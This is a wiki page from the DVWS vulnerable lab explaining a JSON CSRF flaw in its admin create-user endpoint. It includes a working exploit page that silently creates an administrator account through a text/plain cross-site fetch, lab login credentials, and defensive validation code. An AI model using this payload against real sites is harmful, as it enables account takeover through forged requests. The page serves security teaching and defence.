JSON CSRF
Sam Sanoop edited this page Jan 13, 2026
This guide demonstrates how to exploit the JSON CSRF vulnerability in the "Create User" admin feature.
The endpoint /api/v2/admin/create-user allows creating new users. It is intended to accept JSON. However, it is misconfigured to:
- Accept Content-Type: text/plain.
- Parse the request body as JSON even if the Content-Type is text.
- Authenticate using Cookies (which are automatically sent by browsers).
This combination allows an attacker to perform a Cross-Site Request Forgery (CSRF) attack: because text/plain is a CORS-safelisted ("simple") Content-Type, a cross-site fetch or HTML form can send the request without triggering the CORS preflight (OPTIONS) check that usually protects JSON endpoints.
An attacker wants to create a new Administrator account on the target system without knowing the current admin's credentials. They trick a logged-in admin into visiting a malicious webpage.
Host the following HTML file on a malicious server (or locally as exploit.html).
```html
<!DOCTYPE html>
<html>
<body>
  <h1>CSRF Exploit: Creating Admin User</h1>
  <script>
    // Target endpoint
    const url = 'http://dvws.local/api/v2/admin/create-user';

    // Malicious Payload (New Admin User)
    const payload = JSON.stringify({
      username: "hacker_admin",
      password: "password123",
      admin: true
    });

    // Execute CSRF
    // Using 'text/plain' prevents a CORS preflight (OPTIONS) request.
    // 'credentials: include' ensures the victim's session cookies are sent.
    fetch(url, {
      method: 'POST',
      mode: 'no-cors', // Opaque response (we don't need to read it)
      headers: {
        'Content-Type': 'text/plain'
      },
      body: payload,
      credentials: 'include'
    }).then(() => {
      document.body.innerHTML += "<p>Exploit sent!</p>";
    }).catch(e => {
      document.body.innerHTML += "<p>Error: " + e + "</p>";
    });
  </script>
</body>
</html>
```
- Log in to the DVWS application as an Admin (e.g., admintest/admintest).
- Open the exploit.html file in a separate browser tab (simulating visiting a malicious link).
- The script will execute automatically in the background.
- Verify: Go back to the DVWS application (or log out). Try logging in with the credentials:
  - Username: hacker_admin
  - Password: password123
- If successful, you will be logged in, and checking the Profile area will show Role: Admin.
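As an added example (not DVWS's own code), the request-gating logic a defender would put in front of /api/v2/admin/create-user: it refuses the text/plain body the exploit above relies on, so a cross-site page can only reach the JSON parser by sending application/json, which the browser will not do without a CORS preflight, and it checks the Origin and Sec-Fetch-Site headers as defence in depth. The allowed-origin list and the sample header sets are assumptions constructed for the example.

```javascript
// Added example: hardening checks for a JSON-only, cookie-authenticated endpoint.
// Not DVWS code; the allowed-origin list is an assumed deployment value.
const ALLOWED_ORIGINS = new Set(['http://dvws.local']);

// Reduce a Content-Type header to its media type (lowercase, parameters dropped).
function mediaType(contentType) {
  if (typeof contentType !== 'string') return '';
  return contentType.split(';')[0].trim().toLowerCase();
}

// Decide whether a state-changing request may be handed to the JSON body parser.
// Returns { ok: true } or { ok: false, reason } so the caller can log the reason.
function checkJsonRequest(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  // 1. Insist on application/json. A browser cannot send this Content-Type
  //    cross-site without a CORS preflight, so the forged text/plain body
  //    used by the exploit page is rejected before it reaches JSON.parse.
  if (mediaType(h['content-type']) !== 'application/json') {
    return { ok: false, reason: 'unsupported Content-Type' };
  }
  // 2. Defence in depth: browsers mark cross-site requests with
  //    Sec-Fetch-Site and (for POST) an Origin header; accept only our own.
  const site = h['sec-fetch-site'];
  if (site !== undefined && site !== 'same-origin' && site !== 'none') {
    return { ok: false, reason: 'cross-site request' };
  }
  if (h['origin'] !== undefined && !ALLOWED_ORIGINS.has(h['origin'])) {
    return { ok: false, reason: 'origin not allowed' };
  }
  return { ok: true };
}

// Constructed sample headers: what the exploit page above would send,
// versus a legitimate same-origin call from the admin UI.
const forgedRequest = {
  'Content-Type': 'text/plain',
  'Origin': 'http://attacker.example',
  'Sec-Fetch-Site': 'cross-site',
  'Cookie': 'session=<victim session>',
};
const legitimateRequest = {
  'Content-Type': 'application/json; charset=utf-8',
  'Origin': 'http://dvws.local',
  'Sec-Fetch-Site': 'same-origin',
  'Cookie': 'session=<admin session>',
};
```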